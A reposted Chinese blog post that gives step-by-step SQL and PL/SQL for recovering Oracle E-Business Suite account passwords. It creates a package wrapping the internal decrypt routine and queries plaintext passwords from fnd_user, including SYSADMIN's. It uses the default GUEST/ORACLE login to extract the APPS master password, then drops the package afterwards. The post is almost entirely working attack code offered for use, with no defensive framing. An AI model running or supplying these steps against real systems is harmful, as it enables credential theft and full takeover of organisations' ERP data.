【转】破解Oracle EBS 账号密码

 

1,创建pkg
CREATE OR REPLACE PACKAGE CrackPwd AUTHID CURRENT_USER AS
  FUNCTION getpwd(orauser IN VARCHAR2, appuserpwd IN VARCHAR2)
    RETURN VARCHAR2;
END CrackPwd;
CREATE OR REPLACE PACKAGE BODY CrackPwd AS
FUNCTION getpwd(orauser IN VARCHAR2, appuserpwd IN VARCHAR2) RETURN VARCHAR2 AS
LANGUAGE JAVA NAME 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(
java.lang.String,java.lang.String) return java.lang.String';
END CrackPwd;

2,如果已知APPS密码,则直接根据用户名查询密码
SELECT user_name,CrackPwd.getpwd('APPS',ENCRYPTED_USER_PASSWORD)  pwd  FROM fnd_user
where user_name = 'SYSADMIN';

3,如果不知道APPS密码,则利用pkg获得APPS密码.
DECLARE
  GUESTUSERPWD   VARCHAR2(200);
  GUESTUSERNAME  VARCHAR2(100);
  GUESTFNDPWD    VARCHAR2(100);
  GUESTENCFNDPWD VARCHAR2(100);
  DELIM          NUMBER;
BEGIN
  GUESTUSERPWD := 'GUEST/ORACLE'; --Can any user password
  IF GUESTUSERPWD IS NULL THEN
    GUESTUSERPWD := UPPER(FND_PROFILE.VALUE('GUEST_USER_PWD'));
  END IF;
  DELIM         := INSTR(GUESTUSERPWD, '/');
  GUESTUSERNAME := UPPER(SUBSTR(GUESTUSERPWD, 1, DELIM - 1));
  SELECT ENCRYPTED_FOUNDATION_PASSWORD
    INTO GUESTENCFNDPWD
    FROM FND_USER_VIEW
   WHERE USER_NAME = GUESTUSERNAME
     AND (START_DATE <= SYSDATE)
     AND (END_DATE IS NULL OR END_DATE > SYSDATE);
  GUESTFNDPWD := CRACKPWD.GETPWD(GUESTUSERPWD, GUESTENCFNDPWD);
  IF NOT (GUESTFNDPWD IS NULL) THEN
    DBMS_OUTPUT.PUT_LINE(GUESTFNDPWD);
  END IF;
END;

GUEST的默认密码是ORACLE.

如果已经知道其他账号的密码,也可以用这个账号和密码.例如:SYSADMIN/SYSADMIN_TEST

 

3,干掉pkg

DROP PACKAGE CrackPwd;

结果演示: 20140505105400

共有 0 条评论

Top